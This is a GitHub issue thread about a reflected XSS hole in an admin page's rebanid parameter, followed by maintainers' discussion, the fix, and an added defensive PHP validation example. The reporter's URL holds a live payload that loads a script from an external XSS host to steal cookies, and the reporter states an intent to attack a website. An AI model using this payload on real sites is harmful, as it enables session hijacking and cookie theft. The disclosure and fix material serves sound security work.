XSS vulnerability in admin.comms.php #253

Closed
l33cy opened this issue Apr 13, 2017 · 9 comments

l33cy commented Apr 13, 2017

There is a reflective XSS vulnerability on line 21 of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.

http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a
Effect in browser: [two screenshots, not preserved]
Code: [screenshot, not preserved]

Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much.

  • Version used: 1.5.4.7
  • PHP and MySQL version: php7.0.12 mysql5
  • Operating System and version: windows10
  • Link to your project: localhost

good-live commented Apr 13, 2017

I don't really see how you can abuse this to get an administrator's cookie?
Also, modern browsers (tried with Chrome) are blocking it.

Author

l33cy commented Apr 13, 2017

Try Firefox

Author

l33cy commented Apr 13, 2017

Its use has certain limits, but that does not affect the harm of the vulnerability. I'm trying to exploit this vulnerability to attack a website.

Contributor

K1N62 commented Apr 16, 2017

If a user opens the link in their browser, the script will be executed; this is how your cookie is stolen. However, this link does more than just show an alert for demonstration purposes: it actually downloads a script and runs it! DO NOT CLICK THE LINK

Author

l33cy commented Apr 17, 2017

Please apply for a CVE number on this site: https://cveform.mitre.org/

@eNNercY1337

very useful for such a small software @l33cy rather show them the fix for it ;)

@sarabveer
Contributor

@l33cy we have had many security holes that were patched and were never on CVE

Member

Groruk commented Apr 17, 2017

Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow.
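
An added example (not part of the thread, and not the change made in e63701e): one way to handle `rebanid` in PHP, assuming the value is an integer ban id that is written into an inline `<script>` block, as the `");</script>` prefix of the reported URL suggests. The function names and `loadReban()` are hypothetical.

```php
<?php
// Added example: hypothetical helper names, not the project's code.

/** Return the ban id as a positive int, or null for anything else. */
function parse_reban_id(array $query)
{
    if (!isset($query['rebanid']) || !is_string($query['rebanid'])) {
        return null; // missing, or an array such as ?rebanid[]=1
    }
    $id = filter_var($query['rebanid'], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode any value as a JavaScript literal safe inside <script>...</script>. */
function js_literal($value): string
{
    // The HEX flags turn < > & ' " into \uXXXX escapes, so the value can
    // neither close the string literal nor end the script element.
    $json = json_encode($value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $json === false ? 'null' : $json;
}

/** Build the inline script; loadReban() is a hypothetical page function. */
function render_reban_script(array $query): string
{
    $id = parse_reban_id($query);
    if ($id === null) {
        return ''; // reject instead of reflecting the input
    }
    return '<script>loadReban(' . js_literal($id) . ');</script>';
}

// Constructed sample inputs, not taken from any real request log.
$samples = [
    ['rebanid' => '42'],
    ['rebanid' => '1");</script><script>alert("a'],
    ['rebanid' => ['1']],
    [],
];
foreach ($samples as $query) {
    $raw = isset($query['rebanid']) ? $query['rebanid'] : null;
    printf("input=%s\n  output=%s\n  as string literal=%s\n",
        var_export($raw, true),
        var_export(render_reban_script($query), true),
        is_string($raw) ? js_literal($raw) : '(not a string)');
}
```

Validation to the expected type is the primary control here; the context-aware encoding in `js_literal()` covers values that legitimately have to stay strings.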

Member

Groruk commented Apr 17, 2017

Fixed with e63701e

Groruk closed this as completed Apr 17, 2017